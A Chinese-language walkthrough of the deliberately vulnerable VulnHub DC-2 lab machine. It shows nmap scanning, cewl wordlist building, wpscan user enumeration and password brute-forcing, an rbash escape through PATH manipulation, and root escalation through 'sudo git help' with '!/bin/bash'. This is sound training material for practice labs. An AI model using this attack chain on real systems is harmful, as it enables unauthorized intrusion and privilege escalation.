Vulnhub靶机:DC-2渗透详细过程

前言

这次练习的靶机是vulnhub平台下的DC系列靶机第二台，下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单，和DC1一样，总共有五个flag。

DC-2与DC-1一样，是一个适合初学者的靶场，需要具备以下前置知识：

• 基础的Linux命令及操作
• 基础的渗透测试工具使用（Kali / Parrot下的工具）

flag--1

先扫描c端，发现目标主机

nmap 192.168.132.0/24

看开启http服务，即打开浏览器输入ip，无法连接服务器且ip变域名

全面扫描目标主机IP

-A:进攻性综合扫描，能收集很多主要信息

-sV:扫描主要的服务信息

-p-:参数p后面是指定端口 后面-是代表所有端口

nmap -A -sV -p- -T4 192.168.132.147

扫描出ssh服务且端口修改为7744

扫描发现 Did not follow redirect to http://dc-2/未能重定向到域名dc-2，也就是说DNS服务器无法解析该域名

所以我们需要修改hosts文件内容，使域名dc-2对应ip

vim /etc/hosts

写入

192.168.132.147 dc-2

因为是在kali写入的，所以需要在kali的浏览器中打开该ip对应域名

在页面下找到flag1

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl. 你常用的字典可能不管用，因此你可能需要cewl一下（cewl是kali的一个工具，可以通过爬行网站关键字建立密码字典）. More passwords is always better, but sometimes you just can’t win them all. 密码越多越好，但有时候你不能赢得所有. Log in as one to see the next flag. 登录以获得下一个flag. If you can’t find it, log in as another. 如果你找不到，可以尝试登录另一个账号.

flag--2

通过flag1得到信息需要cewl一下

cewl dc-2 -w pwd.txt

用wpscan扫一下指定url，枚举其中用户名

wpscan --url dc-2 --enumerate u

将枚举出的用户名写到user.txt中，爆破，拿到账号密码

账号：jerry 密码：adipiscing

账号：tom 密码：parturient

找到网页后台登入地址/wp-admin

登入jerry的账号，找到flag2

if you can't exploit WordPress and take a shortcut, there is another way. 如果你不能利用WordPress找到一条捷径，你可以尝试另一条路 Hope you found another entry point. 希望你能找到另一个入口点

flag--3

根据flag的提示，之前扫描服务的时候有一个ssh端口开放

-p 7744指定ssh端口登陆（因为默认端口是22端口）

因为网页后台是登入jerry的账号成功的所以这里换一块路想到使用tom的账号

ssh [email protected] -p 7744

查看文件

ls

cat flag3.txt

使用cat无法查看flag3.txt但是使用vi可以查看

同时这里发现tom使用rbash：功能特别少，很多命令无法使用

所以我们要绕过rabsh

BASH_PATH[A]=/bin/sh;A

/bin/bash(此时还不能查看flag3.txt)

export PATH=$PATH:/bin/

flag--4

根据flag3提示切换jerry用户

su jerry

cd /home/jerry

ls

cat flag4.txt

flag--5

和dc1一样，suid提权

寻找root用户拥有的文件，并将错误写入/dev/null中

find / -perm -u=s -type f 2>/dev/null

sudo -l

发现git提权

sudo git help ifconfig

!/bin/bash完成提权

cd /root

ls

cat final-flag.txt

Rbash逃逸大全：

https://xz.aliyun.com/t/7642#toc-0

vulnhub之DC-2靶机渗透详细过程 - FreeBuf网络安全行业门户